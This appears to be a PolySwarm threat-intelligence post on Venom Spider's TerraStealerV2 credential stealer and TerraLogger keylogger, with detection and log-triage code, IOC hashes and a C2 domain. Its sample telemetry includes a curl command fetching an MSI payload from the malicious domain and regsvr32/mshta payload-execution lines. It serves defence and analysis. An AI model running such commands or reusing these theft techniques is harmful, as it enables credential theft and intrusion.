Related Families: VenomLNK, TerraLoader, TerraStealer, TerraTV, TerraCrypt, TerraRecon, TerraWiper, lite_more_eggs, RevC2, Venom Loader
Executive Summary
TerraStealerV2 and TerraLogger are two new malware families from Venom Spider, enhancing their Malware-as-a-Service (MaaS) platform with credential theft and keylogging capabilities. These tools, observed between January and April 2025, indicate active development but lack the sophistication of mature Venom Spider malware.
Key Takeaways
- TerraStealerV2 targets browser credentials and cryptocurrency wallets, exfiltrating data via Telegram.
- TerraLogger introduces keylogging to Venom Spider’s arsenal, using a low-level keyboard hook.
- Distribution of TerraStealerV2 leverages multiple formats and trusted Windows utilities like regsvr32.exe and mshta.exe to evade detection.
- Both malware families are under active development, with TerraLogger showing incremental updates and TerraStealerV2 deployed in varied campaigns.
TerraStealerV2 and TerraLogger
Venom Spider, a financially motivated threat actor, has expanded its Malware-as-a-Service (MaaS) ecosystem with two new malware families: TerraStealerV2 and TerraLogger. Identified between January and April 2025, these tools underscore the group’s ongoing focus on credential theft and user activity monitoring. While Venom Spider has a history of deploying stealthy malware through social engineering, these new families appear less polished, suggesting they are still evolving. Recorded Future’s Insikt Group reported on this activity.
TerraStealerV2 is a stealer designed to harvest browser credentials, cryptocurrency wallet data, and browser extension information. It targets Chrome’s “Login Data” database, copying it to `C:\ProgramData\Temp\LoginData` and extracting credentials using a statically linked SQLite library. The malware employs an SQL query to retrieve origin URLs, usernames, and passwords but cannot decrypt credentials protected by Chrome’s Application Bound Encryption (ABE), a security feature introduced in July 2024. This limitation indicates either outdated code or ongoing development. Data is exfiltrated to a Telegram channel and a secondary C2 endpoint. The stealer is delivered as an OCX file, executed via `regsvr32.exe`, and employs anti-analysis checks, such as verifying the file extension and execution context. Distribution methods include MSI, DLL, LNK, and EXE files, often retrieved from the C2 using curl or PowerShell. Ten distinct samples were observed, with some overlapping with ClickFix campaign tactics, such as using `mshta.exe` to execute payloads disguised as MP4 files.
TerraLogger marks Venom Spider’s first observed keylogging capability. Operating as a standalone module, it uses a low-level keyboard hook via `SetWindowsHookExA` to capture keystrokes, logging them to files like `a.txt` or `save.txt` in `C:\ProgramData`. The keylogger handles special characters and Shift key states, writing logs with window titles and keystrokes in formats like `<KEY-[keycode]>` or pipe-delimited abbreviations (`|bck|`). Five samples were identified, with compilation timestamps from January to April 2025, showing minor updates in log file paths and special key representations. Like TerraStealerV2, it is delivered as an OCX file executed via `regsvr32.exe`, but it lacks exfiltration or C2 capabilities, suggesting it is either in early development or designed as a modular component.
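The log artifacts described above are the most direct host-based evidence of TerraLogger, since the module has no C2 traffic to spot. The following triage helper is an added example, not code from the report or from PolySwarm: it scores text for the two token formats the report names (`<KEY-[keycode]>` and pipe-delimited abbreviations such as `|bck|`) and flags files with the reported names `a.txt` and `save.txt` under `C:\ProgramData`. The sample log content, the bracketed window-title line layout, the reading of keycodes as Windows virtual-key codes, and the expansion of `|bck|` to Backspace are all assumptions made for illustration.

```python
"""Forensic triage for TerraLogger-style keylog artifacts.

Added example (not the report's or PolySwarm's code). Only the token
formats, the file names a.txt / save.txt and the C:\\ProgramData drop
directory come from the report; the sample below and the line layout
it uses are constructed for illustration.
"""
import re
from pathlib import Path

KEYCODE_TOKEN = re.compile(r"<KEY-(\d+)>")        # format named in the report
ABBREV_TOKEN = re.compile(r"\|([a-z]{2,6})\|")    # e.g. |bck|, named in the report
KNOWN_LOG_NAMES = {"a.txt", "save.txt"}           # file names named in the report
DEFAULT_LOG_DIR = Path(r"C:\ProgramData")         # drop directory named in the report

# Assumption: keycodes are Windows virtual-key codes (VK_BACK, VK_TAB, ...).
VK_NAMES = {8: "BACKSPACE", 9: "TAB", 13: "ENTER", 27: "ESC", 32: "SPACE"}
# Assumption: pipe abbreviations map to these keys; only |bck| is attested.
ABBREV_NAMES = {"bck": "BACKSPACE"}

# Constructed sample: a bracketed window title followed by captured keystrokes.
SAMPLE_LOG = """[Login - Mozilla Firefox]
admin<KEY-9>P@ssw0rd|bck|d<KEY-13>
[Untitled - Notepad]
meeting notes|bck||bck|
"""


def score_keylog_text(text: str) -> dict:
    """Count TerraLogger-style tokens and decide whether text looks like a keylog."""
    keycodes = KEYCODE_TOKEN.findall(text)
    abbrevs = ABBREV_TOKEN.findall(text)
    titles = [ln[1:-1] for ln in text.splitlines()
              if ln.startswith("[") and ln.endswith("]")]
    return {
        "keycode_tokens": len(keycodes),
        "abbrev_tokens": len(abbrevs),
        "window_titles": titles,
        # Two or more special-key tokens is the (assumed) threshold for a hit.
        "suspicious": len(keycodes) + len(abbrevs) >= 2,
    }


def render_keystrokes(line: str) -> str:
    """Rewrite one captured line into analyst-readable form, e.g. <KEY-9> -> <TAB>."""
    line = KEYCODE_TOKEN.sub(
        lambda m: "<%s>" % VK_NAMES.get(int(m.group(1)), "VK%s" % m.group(1)), line)
    return ABBREV_TOKEN.sub(
        lambda m: "<%s>" % ABBREV_NAMES.get(m.group(1), m.group(1).upper()), line)


def triage_files(files: dict) -> list:
    """Score a {name: content} mapping; only the reported log names are considered."""
    hits = []
    for name, content in files.items():
        if name.lower() not in KNOWN_LOG_NAMES:
            continue
        result = score_keylog_text(content)
        if result["suspicious"]:
            hits.append({"name": name, **result})
    return hits


def triage_directory(directory: Path = DEFAULT_LOG_DIR) -> list:
    """Read candidate files from disk (defaults to C:\\ProgramData) and triage them."""
    files = {}
    for name in KNOWN_LOG_NAMES:
        p = directory / name
        if p.is_file():
            files[name] = p.read_text(errors="replace")
    return triage_files(files)


if __name__ == "__main__":
    for hit in triage_files({"a.txt": SAMPLE_LOG, "notes.txt": "plain note\n"}):
        print(hit["name"], hit["window_titles"], hit["keycode_tokens"], hit["abbrev_tokens"])
    for ln in SAMPLE_LOG.splitlines():
        print(render_keystrokes(ln))
```

On a live host, `triage_directory()` without arguments checks the reported drop directory; the token-count threshold is deliberately low because a short log still confirms the module ran, and the window titles tell the responder which applications were being captured.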
Both malware families leverage trusted Windows utilities, such as `regsvr32.exe` and `mshta.exe`, to evade detection, aligning with Venom Spider’s preference for low-friction deployment. The use of Telegram and `wetransfers[.]io` for C2 reflects a strategy of blending malicious traffic with legitimate services. However, their current limitations indicate immaturity compared to established tools like TerraLoader or VenomLNK. Venom Spider’s history suggests these capabilities will evolve, likely incorporating improved evasion and data collection techniques. As Venom Spider refines these tools, their integration into broader MaaS campaigns could amplify their impact, particularly for high-value targets.
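The delivery and collection behaviours described for both families (regsvr32.exe executing an OCX from a user-writable path, mshta.exe running an MP4-named payload, curl or PowerShell fetching MSI/DLL/LNK/EXE files, the `C:\ProgramData\Temp\LoginData` copy, the keylog files, and lookups of `wetransfers[.]io`) translate into a small set of endpoint detection rules. The code below is an added example, not PolySwarm's tooling: it runs those rules over constructed Sysmon-like events expressed as plain dicts. The event field names, the user-writable-path heuristic for regsvr32, the Telegram API hostname and every value in the sample events are assumptions; only the utilities, paths and the wetransfers[.]io domain come from the report.

```python
"""Detection rules for the TerraStealerV2 / TerraLogger behaviours above.

Added example, not PolySwarm's or the actor's code. Events are simplified,
constructed Sysmon-like dicts with the fields type / image / cmdline /
path / query (an assumption about the telemetry shape).
"""
import re

RULES = []


def rule(name):
    """Register a predicate as a named detection rule."""
    def deco(fn):
        RULES.append((name, fn))
        return fn
    return deco


# Assumed heuristic: legitimate OCX registration rarely comes from these paths.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\")


def _image(ev):
    return ev.get("image", "").lower().rsplit("\\", 1)[-1]


@rule("regsvr32_ocx_from_user_writable_path")
def regsvr32_ocx(ev):
    # Both families are delivered as OCX files executed via regsvr32.exe.
    if ev["type"] != "process" or _image(ev) != "regsvr32.exe":
        return False
    cl = ev["cmdline"].lower()
    return ".ocx" in cl and any(p in cl for p in USER_WRITABLE)


@rule("mshta_executing_mp4_named_payload")
def mshta_mp4(ev):
    # ClickFix-style overlap: mshta.exe running a payload disguised as an MP4.
    return (ev["type"] == "process" and _image(ev) == "mshta.exe"
            and re.search(r"\.mp4\b", ev["cmdline"], re.I) is not None)


@rule("lolbin_download_of_executable_payload")
def download(ev):
    # MSI/DLL/LNK/EXE stages retrieved from the C2 with curl or PowerShell.
    if ev["type"] != "process" or _image(ev) not in ("curl.exe", "powershell.exe"):
        return False
    cl = ev["cmdline"].lower()
    return "http" in cl and re.search(r"\.(msi|dll|lnk|exe)\b", cl) is not None


@rule("terrastealer_logindata_copy_or_terralogger_log")
def artifact_paths(ev):
    # Exact paths named in the report for the stealer copy and the keylog files.
    if ev["type"] != "file":
        return False
    p = ev["path"].lower()
    return p in (r"c:\programdata\temp\logindata",
                 r"c:\programdata\a.txt", r"c:\programdata\save.txt")


@rule("c2_domain_lookup")
def c2_dns(ev):
    # wetransfers[.]io is from the report; api.telegram.org is an assumption.
    if ev["type"] != "dns":
        return False
    q = ev["query"].lower()
    return q.endswith("wetransfers.io") or q == "api.telegram.org"


def run_detections(events):
    """Return (rule_name, event) pairs for every event that fires a rule."""
    return [(name, ev) for ev in events for name, fn in RULES if fn(ev)]


# Constructed sample telemetry: six malicious events, two benign ones.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\victim\AppData\Local\Temp\setup.msi https://wetransfers.io/PLACEHOLDER"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\victim\AppData\Local\Temp\payload.ocx"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\victim\Downloads\video.mp4"},
    {"type": "file", "path": r"C:\ProgramData\Temp\LoginData"},
    {"type": "file", "path": r"C:\ProgramData\save.txt"},
    {"type": "dns", "query": "wetransfers.io"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\control.ocx"'},
    {"type": "dns", "query": "www.microsoft.com"},
]

if __name__ == "__main__":
    for name, ev in run_detections(SAMPLE_EVENTS):
        print(name, "<-", ev)
```

The download rule is the noisiest of the five in a real fleet and would normally be gated on parent process (mshta.exe or wscript.exe) or on the destination path; the artifact-path and regsvr32 rules are narrow enough to page on directly.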
Who is Venom Spider?
Venom Spider, also known as Golden Chickens and TA4557, is a financially motivated cybercriminal group operating primarily out of Russia. Active since at least 2012, Venom Spider develops and distributes sophisticated malware toolsets, including SKID, VenomKit, Taurus Loader, and the notorious More_eggs backdoor. Their tactics, techniques, and procedures (TTPs) include deploying spear-phishing campaigns targeting human resources departments with malicious resumes to deliver More_eggs, which collects system information and communicates with command-and-control servers. They employ server-side polymorphism to evade detection, using obfuscated JavaScript and time-delayed execution to bypass sandboxing. The group also limits the distribution of its malware to trusted affiliates, collaborating with other criminal actors like COBALT SPIDER, WIZARD SPIDER, and PINCHY SPIDER.
Venom Spider primarily targets organizations in North America and Europe, with recent campaigns focusing on e-commerce, human resources, and corporate recruiting sectors. Notable activities include phishing schemes exploiting job seekers to infect HR systems, observed as recently as April 2025. There is no definitive evidence linking Venom Spider to a specific nation-state military or intelligence entity, such as the KGB or FSB, though their operations align with Russia's broader cybercriminal ecosystem.
IOCs
PolySwarm has multiple samples associated with this activity.
14d9d56bc4c17a971a9d69b41a4663ab7eb2ca5b52d860f9613823101f072c31
1ed9368d5ac629fa2e7e81516e4520f02eb970d010d3087e902cd4f2e35b1752
313203cb71acd29e6cc542bf57f0e90ce9e9456e2483a20418c8f17b7afe0b57
4b6fa036aceb1e2149848ff46c4e1a6a89eee3b7d59769634ce9127fdaa96234
766690a09ec97e414e732d16b99b19389a91835abc15684cc0f1aba2ca93cf98
77be5500892fee02b79e58782dbb213e952d2c4badbb2ab862f3f4d304ec9b4e
9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a
de6ed44d21e5bc9bc5c1c51f33760a5d96378308d02c2c81ef2d75e7a201fb63
93ca6b9ead4c853264050163a3748079031fe41dd7b5d82d2849ab22de0ee0b4
You can use the following CLI command to search for all TerraStealerV2 samples in our portal:
$ polyswarm link list -f TerraStealerV2
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.